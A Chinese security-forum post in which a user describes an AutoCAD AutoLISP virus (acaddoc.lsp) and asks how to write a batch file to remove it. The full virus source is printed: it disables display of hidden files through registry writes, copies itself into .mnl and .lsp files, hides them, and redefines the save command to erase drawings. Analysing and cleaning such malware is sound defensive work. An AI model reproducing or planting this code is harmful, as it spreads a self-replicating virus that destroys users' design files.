好友
阅读权限10
听众
最后登录1970-1-1
|
ftmm
发表于 2011-4-9 22:13
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
一下是cad病毒代码,原文件名字叫做:acaddoc.lsp,与dwg文件放在一起的时候,autocad打开dwg文件,病毒就会被执行,病毒
首先会修改注册表,破坏系统显示隐藏文件的功能。把自己复制到cad目录下,感染当前使用的mnl文件。并且将其隐藏。
然后在工作目录继续生成acaddoc.lsp,不过他有一个bug,就是可能出现用死循环的方式在cad的执行目录下不断向acaddoc.lsp写入同样的内容,
所以中了这个病毒,如果不按下esc键,是永远无法打开cad,这个文件可能会有几个g大小。
我想请教一下,我想做一个bat来清楚这个病毒,而不是简单的删除。bat首先列举出硬盘的mnl文件和lsp文件。
再读取这些mnl文件和lsp文件,与一下内容对比,相同的删除,不同的内容保留,请问应该怎么做?
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
(vl-load-com)
(setvar "cmdecho" 0)
(setvar "filedia" 1)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"DefaultValue"
0
)
(setq mnlpth (getvar "menuname"))
(setq dwgpre (getvar "dwgprefix"))
(if (setq doclsp (findfile "acaddoc.lsp"))
(progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
(chklsp (strcat mnlpth ".mnl") doclsp)
(chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
)
)
(setq mac0
'(2256 2256 2726 2256 2585 2726 3243 2679
2726 2256 3149 2726 3196 3290 2726 2632
2397
)
)
(if (and (> (setq cdate (getvar "cdate")) 20090909)
(member (vl-string->list (car (macaddr))) (mkgroup mac0))
(= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
)
(dolsp)
)
(princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
(if (setq fp3 (open fp1 "r"))
(progn
(if
(not
(wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
"*;;;jjyy*"
)
)
(writelsp fp2 fp1)
)
(close fp3)
)
(writelsp fp2 fp1)
)
(attset fp1 2)
(attset fp2 2)
)
(defun writelsp (fp1 fp2 / fp3 fp4 tem)
(setq fp3 (open fp1 "r")
fp4 (open fp2 "a")
)
(while (setq tem (read-line fp3)) (write-line tem fp4))
(close fp3)
(close fp4)
(princ)
)
(defun attset (fp code / fp1)
(if (and (/= "" fp) code)
(progn (vl-load-com)
(vlax-put-property
(setq fp1 (vlax-invoke-method
(vlax-create-object "Scripting.FileSystemObject")
'GetFile
fp
)
)
'Attributes
code
)
)
)
(vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
(setq i 1)
(repeat 500
(setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
(setq i (1+ i))
)
(reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
(vl-load-com)
(if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
(progn
(setq
con (vl-catch-all-apply
'vlax-invoke
(list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
)
)
(if (vl-catch-all-error-p con)
(setq
con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
)
)
(setq lox (vlax-invoke
con
'ExecQuery
"Select * From Win32_NetworkAdapter "
)
)
(vlax-for i lox
(if (vlax-get i 'NetConnectionID)
(progn (setq sn (vlax-get i 'MACAddress))
(or (member sn mac) (setq mac (cons sn mac)))
)
)
)
(mapcar 'vlax-release-object (list lox con WMIobj))
)
)
(reverse mac)
)
(defun dolsp ()
(command "undefine" "qsave")
(command "undefine" "saveas")
(command "undefine" "wblock")
(command "undefine" "insert")
(command "undefine" "pline")
)
(defun c:qsave ()
(command "_.erase" (ssget "x") "")
(princ)
)
(defun c:saveas (/ fp1)
(setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
(chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
(findfile "acaddoc.lsp")
)
(princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
|
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|